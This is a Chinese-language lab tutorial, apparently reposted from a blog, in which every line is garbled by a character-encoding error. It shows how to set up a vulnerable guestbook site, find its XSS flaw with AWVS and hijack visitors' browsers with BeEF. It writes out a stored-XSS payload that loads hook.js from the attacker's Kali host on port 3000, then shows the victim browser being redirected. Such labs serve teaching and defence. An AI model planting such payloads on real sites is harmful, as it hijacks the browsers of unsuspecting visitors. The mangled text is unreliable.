實(shí)驗(yàn)?zāi)康模毫私馐裁词荴SS;了解XSS攻擊實(shí)施,理解防御XSS攻擊的方法
系統(tǒng)環(huán)境:Kali Linux 2、Windows Server
網(wǎng)絡(luò)環(huán)境:交換網(wǎng)絡(luò)結(jié)構(gòu)
實(shí)驗(yàn)工具: Beef;AWVS(Acunetix Web Vulnarability Scanner)
實(shí)驗(yàn)步驟:
實(shí)驗(yàn)環(huán)境搭建。
角色:留言簿網(wǎng)站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻擊者:Kali(使用beEF生成惡意代碼,并通過留言方式提交到留言簿網(wǎng)站);
被攻擊者:訪問留言簿網(wǎng)站,瀏覽器被劫持。
首先攻擊者和被攻擊者需要連接同一個(gè)網(wǎng)絡(luò)。
1.攻擊者打開kali,打開Windows Server2003,二者都需要設(shè)置為橋接模式。
注意要同時(shí)設(shè)置虛擬網(wǎng)絡(luò)適配器為橋接模式
?文章來源地址http://www.zghlxwxcb.cn/news/detail-436014.html
2.Windows Server2003中需要把guestbook拉入D盤中,如果拉不進(jìn)去,可用u盤協(xié)助,或下載VMare tools(可以去找找這個(gè)怎么下載)。
?
?3.利用Windows Server2003創(chuàng)建一個(gè)網(wǎng)站
找到默認(rèn)網(wǎng)站,右鍵選擇屬性?
?
?將GuestBook選入
?查看ip
?配置ip
?添加message.asp
?
?打開瀏覽器,輸入服務(wù)器ip可看到留言簿網(wǎng)站
?文章來源:http://www.zghlxwxcb.cn/news/detail-436014.html
4.利用AWVS掃描留言簿網(wǎng)站,發(fā)現(xiàn)其存在XSS漏洞
?一直next直到finish
?發(fā)現(xiàn)xss漏洞
?
?5.kali輸入beef-xss指令得到惡意代碼(如果沒安裝beef需要先安裝,輸入beef-xss然后根據(jù)提示一直‘y’就好了)
?惡意代碼為圖中紅框部分,用的時(shí)候是<script src="http://Kali的IP地址:3000/hook.js"></script>,所以需要查看kali的ip
?輸入beef-xss后會(huì)彈出一個(gè)頁面,我們輸入賬號(hào)密碼登錄進(jìn)去
?
6.訪問http://留言簿網(wǎng)站/message.asp,將惡意代碼寫入網(wǎng)站留言板
?如果留言被管理員審核通過,你的留言能在留言板顯示出來。當(dāng)客戶端訪問服務(wù)器的留言板后,你可以在Beef控制端查看目標(biāo)主機(jī),如果出現(xiàn)下圖所示內(nèi)網(wǎng),表示客戶端瀏覽器已經(jīng)被成功劫持。
?
?
?7.在Current Browser項(xiàng)選擇Browser,點(diǎn)擊Hooked Domain選擇Redirect Browser,在右邊的Redirect URL中輸入網(wǎng)址,即可控制瀏覽器跳轉(zhuǎn)到目標(biāo)網(wǎng)址
?例如,輸入https://www.csdn.net/即可控制受害者的頁面跳轉(zhuǎn)到CSDN官網(wǎng)頁面
?
?
?
到了這里,關(guān)于XSS攻擊:利用Beef劫持被攻擊者客戶端瀏覽器的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!